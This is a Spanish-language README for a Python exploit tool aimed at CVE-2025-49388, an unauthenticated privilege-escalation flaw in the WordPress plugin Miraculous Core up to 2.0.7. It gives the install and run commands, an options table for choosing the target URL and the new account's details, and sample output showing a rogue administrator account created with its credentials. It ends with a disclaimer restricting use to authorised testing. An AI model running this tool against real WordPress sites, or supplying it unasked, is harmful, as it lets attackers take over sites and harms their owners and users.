
Miraculous Core (kamleshyadav) ≤ 2.0.7 — Escalada de Privilegios No Autenticada
El plugin Miraculous Core de WordPress <= 2.0.7 es vulnerable a la escalada de privilegios.
La vulnerabilidad de Asignación incorrecta de privilegios en el plugin Miraculous Core de kamleshyadav permite a atacantes no autenticados escalar privilegios y registrar cuentas de administrador.
Versiones afectadas: n/a hasta 2.0.7
CVSS 3.1 de Patchstack CNA:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HCVSS de NIST: (Evaluación aún no proporcionada)
Este script de Python automatiza la explotación de CVE-2025-49388 registrando una nueva cuenta de administrador en instancias vulnerables de WordPress con el plugin Miraculous Core instalado.
Proporciona alta fiabilidad, aleatoriza los datos para una explotación fiable y repetible, y gestiona automáticamente cabeceras, cookies e intentos de omisión.
Instalar dependencias:
pip install requests colorama
python CVE-2025-49388.py -u <target-url> [OPTIONS]
Ejemplo:
python CVE-2025-49388.py -u http://127.0.0.1/wordpress
| Opción | Descripción | Ejemplo |
|---|---|---|
-u, --url | URL objetivo de WordPress (obligatoria) | -u http://target.com/wordpress |
-un, --username | Nombre de usuario deseado (por defecto: aleatorio) | -un admin1337 |
-fn, --full_name | Nombre completo (por defecto: Nxploited) | -fn "John Doe" |
-em, --useremail | Correo electrónico (por defecto: aleatorio) | -em [email protected] |
-pw, --password | Contraseña (por defecto: Str0ng!Pass123) | -pw MySecretPass! |
-o, --output | Guardar resultados en un archivo | -o result.txt |
Nota:
Si omites el nombre de usuario o el correo electrónico, se generarán valores aleatorios en cada ejecución para evitar errores de duplicados.
[Nxploited INFO] Target: http://target/wp-admin/admin-ajax.php
[Nxploited INFO] Starting exploitation attempt...
[Nxploited SUCCESS] Exploitation succeeded! Nxploited By Nxploited
[Nxploited CREDENTIALS]
Username : Nxploited_4pQz1x
Password : Str0ng!Pass123
Email : [email protected]
Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.
La explotación no autorizada de sistemas sin permiso explícito es ilegal y poco ética.
El autor no asume ninguna responsabilidad por el mal uso o los daños. Úsala de forma responsable.